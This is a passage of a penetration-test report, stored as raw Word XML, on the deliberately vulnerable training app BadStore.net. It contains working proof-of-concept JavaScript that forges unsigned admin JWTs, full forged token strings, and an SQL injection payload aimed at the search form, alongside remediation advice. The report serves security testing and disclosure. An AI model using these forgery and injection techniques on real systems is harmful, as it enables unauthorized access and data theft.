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BadStore.net v1.2.3s</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“BadStore.net v1.2.3s”</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BadStore.net v1.2.3s took place on 2026-02-23.</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JWT None Algorithm Acceptance - Token Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection in Search Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.8</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727f280da76183d18e0b7d3c59aec0b98b037b5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT None Algorithm Acceptance - Token Forgery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Cookie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">‘token’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, JWT authentication endpoint</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accepts JWT tokens signed with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">algorithm, allowing complete authentication bypass through token forgery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Details:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- The application stores JWT tokens in a cookie named</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘token’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- The JWT header specifies:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"typ":"JWT","alg":"none"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- No signature validation is performed on the token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- An attacker can forge arbitrary tokens with any user identity and privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Attacker crafts a JWT with header:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"alg":"none","typ":"JWT"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Attacker sets any desired payload including</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">role: "admin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Token is accepted by the application without verification</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Attacker gains unauthorized access with admin privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Discovered Token (Decoded):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Header:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"typ":"JWT","alg":"none"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Payload contains: user id, username, email, role (admin), isActive status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Signature: Empty/not validated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Forged Token Created:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Successfully forged token with:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“attacker”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- email:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“attacker@evil.com”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- role:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“admin”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- id: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The forged token was accepted and stored in the application cookies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Original Token Discovery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘token’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">found with value:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6OTk5LCJ1c2VybmFtZSI6ImhhY2tlciIsImVtYWlsIjoiaGFja2VyQGV2aWwuY29tIiwicm9sZSI6ImFkbWluIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjYtMDItMjAgMDI6MDE6NTkuMzg2ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjYtMDItMjAgMDI6MDE6NTkuMzg2ICswMDowMCJ9LCJpYXQiOjE3NzE3Mjg4Mjh9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decoded Header:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"typ"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"JWT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"alg"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"none"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decoded Payload:</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999</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"hacker"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"hacker@evil.com"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1771728828</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Token Forgery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Forged token with attacker-controlled identity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">typ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'JWT'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">alg</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'attacker'</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'attacker@evil.com'</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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isActive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iat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encodedHeader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(header))</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encodedPayload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rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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forgedToken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encodedHeader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encodedPayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w: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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`token=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">forgedToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">; path=/`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Resulting forged token:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiJhdHRhY2tlciIsImVtYWlsIjoiYXR0YWNrZXJAZXZpbC5jb20iLCJyb2xlIjoiYWRtaW4iLCJpc0FjdGl2ZSI6dHJ1ZX0sImlhdCI6MTc3MTgxNjYzMH0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The forged token was successfully stored in cookies and accepted by the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">algorithm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Configure the JWT library to explicitly reject tokens with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alg: 'none'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in the header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use strong signature algorithms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Only accept tokens signed with secure algorithms like RS256, ES256, or HS256 (with strong secrets).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Validate algorithm explicitly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: When verifying JWTs, specify the expected algorithm and don’t allow algorithm switching via the token header.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use library defaults carefully</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Many JWT libraries accept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘none’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by default for development. Ensure production configurations disable this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example secure implementation (Node.js/jsonwebtoken):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// WRONG - accepts any algorithm</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secret)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// CORRECT - explicitly specify algorithm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">algorithms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'HS256'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Add audience and issuer validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Verify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iss</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">aud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">claims match expected values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Implement proper key management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Use asymmetric keys (RS256/ES256) for distributed systems where the public key can be shared securely.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="27" w:name="finding-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="sql-injection-in-search-functionality"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection in Search Functionality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5">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GET /cgi-bin/badstore.cgi?action=search&amp;searchquery=</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search functionality at /cgi-bin/badstore.cgi?action=search is vulnerable to SQL injection. User input from the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘searchquery’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parameter is directly concatenated into a SQL query without proper sanitization or parameterization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application uses a MariaDB/MySQL database (evident from DBD::mysql driver error messages). When a single quote (’) is submitted, the application returns a raw SQL syntax error revealing the query structure and confirming the injection point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerable query structure appears to be:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE [user_input] IN (itemnum,sdesc,ldesc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker can inject SQL code such as ’ OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘1’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=’1 to manipulate the query logic. The application was observed displaying the complete raw SQL query with injected payloads on the search results page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate to http://localhost:3336/cgi-bin/badstore.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter a single quote (’) in the search box and submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe the SQL syntax error:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“DBD::mysql::st execute failed: You have an error in your SQL syntax…near ’’’’ IN (itemnum,sdesc,ldesc)’”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
